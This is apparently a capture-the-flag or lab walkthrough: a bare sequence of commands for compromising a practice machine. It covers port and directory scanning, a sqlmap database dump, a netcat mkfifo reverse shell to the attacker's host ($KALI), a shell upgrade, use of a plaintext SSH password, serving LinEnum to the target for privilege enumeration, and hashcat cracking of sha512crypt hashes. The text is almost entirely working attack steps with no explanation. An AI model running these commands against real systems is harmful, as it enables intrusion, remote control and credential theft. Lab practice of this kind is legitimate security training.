No other ports found.
nmap -sV -sT -O -p 1-65535 $VICTIM
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
sqlmap -u http://$VICTIM/administrator.php --forms --dump
Method 1: nc Reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc $KALI 1337 >/tmp/f
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
Method 2: Hidden passwords:
find / -user www-data 2>/dev/null
cat /var/hidden/pass
ssh pingu@$VICTIM
Password: pinguapingu
wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
python2 -m SimpleHTTPServer 81
cd /tmp/
wget http://$KALI:81/LinEnum.sh
chmod +x LinEnum.sh
./LinEnum.sh
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat -m 1800 -a 0 hash /usr/share/wordlists/rockyou.txt --show
